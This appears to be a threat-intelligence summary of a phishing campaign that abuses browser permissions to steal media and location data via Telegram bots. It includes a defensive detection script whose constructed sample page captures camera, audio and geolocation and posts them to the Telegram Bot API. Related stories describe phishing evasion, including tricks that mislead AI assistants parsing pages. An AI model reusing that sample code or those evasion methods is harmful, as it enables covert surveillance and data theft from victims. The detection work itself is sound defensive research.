Mallory

AI-Assisted Phishing Campaign Abusing Browser Permissions for Data Theft

Tags: phishing-campaign-intelligence, data-exfiltration-method, ai-enabled-threat-activity, identity-impersonation-fraud, command-and-control-method
Updated March 21, 2026 at 05:49 AM. 3 sources

A large-scale phishing campaign is using fake service and verification pages such as “ID Scanner,” “Telegram ID Freezing,” and “Health Fund AI” to trick victims into granting browser access to sensitive device capabilities. Once permissions are approved, malicious JavaScript captures images, video, microphone audio, device details, contact information, and approximate geolocation, then exfiltrates the data to attacker-controlled Telegram bots and related infrastructure. Researchers said the operation is hosted primarily on edgeone.app infrastructure and goes beyond traditional credential theft by collecting rich multimedia and contextual data that could support identity theft, follow-on social engineering, account compromise, or extortion.

Analysis of the phishing framework found signs of AI-assisted code generation, including structured annotations and emoji-style formatting embedded in the code, indicating that generative AI may have been used to speed development of the campaign. A separate report on the DRILLAPP malware targeting Ukrainian entities describes a different, Russia-linked espionage operation involving Microsoft Edge headless mode and LNK and HTA execution; although it overlaps in browser permission abuse and media capture, it is a distinct incident and is not part of this story.

Timeline

  1. Mar 18, 2026

    SC Media reports Cyble's findings on the phishing operation

    SC Media summarized Cyble's research, emphasizing that the campaign had been active since early 2026 and used browser permission abuse instead of conventional credential harvesting to steal sensitive victim data.

  2. Mar 16, 2026

    Cyble discloses campaign and notes signs of AI-assisted development

    Cyble Research & Intelligence Labs publicly reported the campaign, stating it was primarily hosted on edgeone.app infrastructure and highlighting code characteristics such as structured annotations and emoji-based formatting that may indicate AI-assisted script development.

  3. Jan 1, 2026

    Attackers exfiltrate stolen data via Telegram Bot API

    Rather than relying on traditional credential theft or dedicated backend infrastructure, the operation used client-side JavaScript and legitimate browser APIs to gather data and sent the stolen information to attacker-controlled Telegram bots.

  4. Jan 1, 2026

    Campaign harvests browser-accessible biometric and device data

    The phishing pages impersonated brands including TikTok, Telegram, Instagram, Chrome/Google Drive, and Flappy Bird, then abused browser permission prompts to collect camera images, video, microphone audio, contacts, device metadata, and approximate geolocation from victims.

  5. Jan 1, 2026

    AI-assisted phishing campaign begins targeting victims

    A phishing operation became active in early 2026, using rotating social-engineering lures such as ID scanning, account freezing, and health-related themes to trick users into visiting malicious pages.
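The summary above and timeline entries 3 and 4 describe the mechanism in outline: client-side JavaScript calls permission-gated browser APIs (camera, microphone, geolocation, contacts), then posts the captured data to the Telegram Bot API. The following is an added example, not Cyble's analysis code or any code from the campaign itself: a static triage routine a defender could run over JavaScript pulled from a suspect page (a proxy log, a sandbox, a takedown request). It flags the combination of a permission-gated data source and a Telegram sink in one script and extracts the bot token and chat_id as indicators. The three sample scripts are constructed for the demonstration; the bot token shape (numeric bot id, colon, 35-character secret) and the assumption that kits hard-code the token and chat_id in the page are triage heuristics, not facts from the report.

```javascript
// Static triage of page JavaScript for the pattern this story describes:
// permission-gated browser capture APIs (camera, microphone, geolocation,
// contacts) in the same script as a Telegram Bot API sink. Added example,
// not Cyble's or the campaign's code; the sample scripts are constructed.

// Browser APIs behind a permission prompt that yield the data classes listed
// in the story. navigator.userAgent etc. are not gated and only add context.
const CAPTURE_APIS = {
  camera_or_microphone: /navigator\.mediaDevices\.getUserMedia\s*\(/,
  media_recording: /new\s+MediaRecorder\s*\(/,
  geolocation: /navigator\.geolocation\.(?:getCurrentPosition|watchPosition)\s*\(/,
  contacts: /navigator\.contacts\.select\s*\(/,
};
const DEVICE_METADATA = /navigator\.(?:userAgent|platform|hardwareConcurrency|deviceMemory)\b/;

// Telegram Bot API: https://api.telegram.org/bot<token>/<method>. The token is
// "<bot id>:<35-char secret>". Assumption: kits hard-code token and chat_id in
// the page, which makes both usable as indicators. Token shape is a heuristic.
const TELEGRAM_HOST = /api\.telegram\.org\/bot/;
const TELEGRAM_METHOD = /\/(send(?:Message|Photo|Document|Video|Audio|Voice|Location|MediaGroup))\b/g;
const BOT_TOKEN = /(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])/g;
const CHAT_ID = /chat_id["']?\s*[:=,]\s*["']?(-?\d{6,})/g;

function analyzeScript(source) {
  const capture = Object.keys(CAPTURE_APIS).filter((k) => CAPTURE_APIS[k].test(source));
  const telegram = TELEGRAM_HOST.test(source);
  const indicators = {
    botTokens: [...new Set([...source.matchAll(BOT_TOKEN)].map((m) => m[1]))],
    chatIds: [...new Set([...source.matchAll(CHAT_ID)].map((m) => m[1]))],
    // Method names are only meaningful when the Telegram host is referenced.
    methods: telegram ? [...new Set([...source.matchAll(TELEGRAM_METHOD)].map((m) => m[1]))] : [],
  };

  // Source and sink together is the story's pattern. Either alone is common in
  // legitimate code (video chat; Telegram notifications), so it is queued for review.
  let verdict = 'benign';
  if (capture.length && telegram) verdict = 'suspicious';
  else if (capture.length || telegram) verdict = 'review';

  return { verdict, capture, deviceMetadata: DEVICE_METADATA.test(source), indicators };
}

// Constructed sample 1: a fake "ID scanner" page in the style the story describes.
const SAMPLE_ID_SCANNER = `
  const BOT = "1234567890:AAFexampleSecretPartOfTokenValue000";
  async function verifyIdentity() {
    const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
    const rec = new MediaRecorder(stream);
    navigator.geolocation.getCurrentPosition((p) => {
      fetch(\`https://api.telegram.org/bot\${BOT}/sendMessage\`, { method: "POST",
        body: JSON.stringify({ chat_id: "987654321", text: navigator.userAgent + " " + p.coords.latitude }) });
    });
    rec.ondataavailable = (e) => {
      const form = new FormData();
      form.append("chat_id", "987654321");
      form.append("video", e.data);
      fetch("https://api.telegram.org/bot" + BOT + "/sendVideo", { method: "POST", body: form });
    };
  }`;

// Constructed sample 2: a legitimate video-call page. Same capture API, no Telegram sink.
const SAMPLE_VIDEO_CALL = `
  const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });
  pc.addTrack(stream.getVideoTracks()[0], stream);`;

// Constructed sample 3: ordinary analytics beacon; reads metadata but no gated API.
const SAMPLE_ANALYTICS = `
  navigator.sendBeacon("/collect", JSON.stringify({ ua: navigator.userAgent }));`;

// Run the analyzer over a named set of scripts and return one result per name.
function triage(samples) {
  const out = {};
  for (const [name, src] of Object.entries(samples)) out[name] = analyzeScript(src);
  return out;
}

const report = triage({ idScanner: SAMPLE_ID_SCANNER, videoCall: SAMPLE_VIDEO_CALL, analytics: SAMPLE_ANALYTICS });
for (const [name, r] of Object.entries(report)) {
  console.log(name, r.verdict, r.capture.join(','), JSON.stringify(r.indicators));
}
```

The verdict deliberately requires both halves of the pattern. Flagging getUserMedia alone would bury analysts in video-conferencing front ends, and flagging the Telegram host alone would catch every notification integration; the pairing is what distinguishes this campaign from ordinary use of the same APIs. An extracted bot token is directly actionable: Telegram's getMe and getUpdates methods can be used to confirm the bot and, where policy allows, to support takedown requests.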


Related Stories

AI-Assisted Phishing Kits Targeting Microsoft and Google Users

A sophisticated phishing campaign has emerged, leveraging AI-assisted development to target Microsoft Outlook users, particularly Spanish speakers. The operation, active since March 2025, employs a modular phishing kit that mimics the Outlook login interface and uses real-time reconnaissance to enrich stolen credentials with IP and geolocation data. Stolen information is exfiltrated via Telegram bots and Discord webhooks, and the kit's evolution shows clear signs of AI-generated code, including clean structure and Spanish-language comments. Researchers identified the campaign through a unique mushroom emoji signature embedded in the phishing kit, which has been observed in over 75 deployments. In a parallel development, another phishing wave has exploited Google Cloud Application Integration to send convincing emails from legitimate Google addresses, bypassing traditional security filters. This campaign, uncovered by Check Point researchers, uses a multi-stage process: victims receive official-looking emails, are redirected through Google infrastructure, and ultimately land on a fake Microsoft login page designed to harvest credentials. The attack has targeted over 3,000 organizations globally, with significant activity in the United States, Asia-Pacific, and Europe. Both campaigns demonstrate the increasing sophistication and global reach of phishing operations using advanced technical methods and trusted platforms to deceive users.

1 month ago
Phishing Campaigns Evade Detection by Abusing AI and Trusted Email Security Controls

Security researchers reported multiple **phishing evasion** techniques designed to defeat modern email and AI-assisted defenses rather than relying only on traditional lure quality. One campaign analyzed by KnowBe4 used **graymail-style content padding** and extreme whitespace insertion to manipulate NLP-based email security tools, placing benign promotional text, legitimate signatures, and trusted links far below the visible phishing lure so scanners would weigh the message as less malicious. A separate LevelBlue-tracked trend showed attackers abusing enterprise **URL rewriting** and *Safe Links*-style protections by sending phishing through compromised accounts, causing security gateways to generate trusted wrapped URLs that could then be reused in campaigns targeting **Microsoft 365** users. The activity reflects a broader shift toward exploiting the gap between what users see and what automated systems inspect. In the URL-rewriting abuse, operators tied to **Tycoon2FA** and **Sneaky2FA** built multi-layer redirect chains across several trusted vendor domains to obscure final destinations and steal credentials and MFA session cookies through adversary-in-the-middle infrastructure, enabling account takeover, internal phishing, data theft, and sometimes ransomware follow-on activity. Related research from LayerX showed a different but thematically aligned evasion method in which **font rendering and CSS** make webpages display malicious commands to users while AI assistants parsing the underlying HTML see only harmless text, underscoring that attackers are increasingly targeting AI and trust-based inspection layers as part of phishing and social-engineering operations.

1 month ago
Phishing campaigns abuse trusted platforms and authentication flows to evade detection and steal credentials

Multiple active phishing operations are leveraging *trusted services* and *by-design web/authentication features* to bypass security controls and harvest credentials and MFA data. **GTFire** is a large-scale credential-harvesting campaign that hides behind legitimate Google-owned domains by abusing **Firebase** and **Google Translate** to make phishing links appear trustworthy to email filters and web gateways; victims are sent to brand-impersonation login pages and then redirected to the real site after submitting credentials. Separately, Microsoft reported phishing that abuses **OAuth redirection** behavior in identity providers (including **Microsoft Entra ID** and **Google Workspace**) by registering malicious OAuth apps with attacker-controlled redirect URIs and using silent auth flows/invalid scopes to bounce users to attacker infrastructure; Microsoft disabled the identified malicious Entra OAuth applications but noted related activity continues and requires monitoring. A distinct but thematically similar campaign uses a fake Google Account security site to trick users into installing a **malicious Progressive Web App (PWA)** that can steal one-time passcodes (via **WebOTP** where supported), harvest data (e.g., clipboard contents), and even turn the victim’s browser into an attacker-controlled **proxy** with internal port-scanning capability; Malwarebytes-linked reporting highlighted the lure domain `google-prism[.]com` and the use of permission prompts (notifications/clipboard) to enable ongoing abuse. Other items in the set cover unrelated threats (Android malware using generative AI for persistence, an Iraq-focused APT toolchain, a separate AiTM phishing-kit attribution case study, and research on a cybercrime infrastructure provider), and do not describe the same specific phishing operations described above.

1 month ago